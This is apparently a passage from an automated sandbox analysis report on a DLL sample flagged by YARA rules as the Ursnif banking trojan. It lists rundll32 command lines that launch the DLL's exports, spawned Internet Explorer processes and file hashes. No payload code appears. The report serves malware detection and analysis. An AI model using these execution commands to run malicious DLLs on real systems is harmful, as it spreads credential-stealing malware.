• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, Author: Joe Security
Reputation: high

General

Start time: 15:23:15
Start date: 09/07/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\c36.dll,Division
Imagebase: 0x11b0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:23:19
Start date: 09/07/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\c36.dll,Fastcolor
Imagebase: 0x11b0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:23:24
Start date: 09/07/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\c36.dll,Yetclose
Imagebase: 0x11b0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:24:28
Start date: 09/07/2021
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase: 0x7ff6d8670000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:24:29
Start date: 09/07/2021
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5468 CREDAT:17410 /prefetch:2
Imagebase: 0x1170000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:24:38
Start date: 09/07/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 852
Imagebase: 0x1110000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis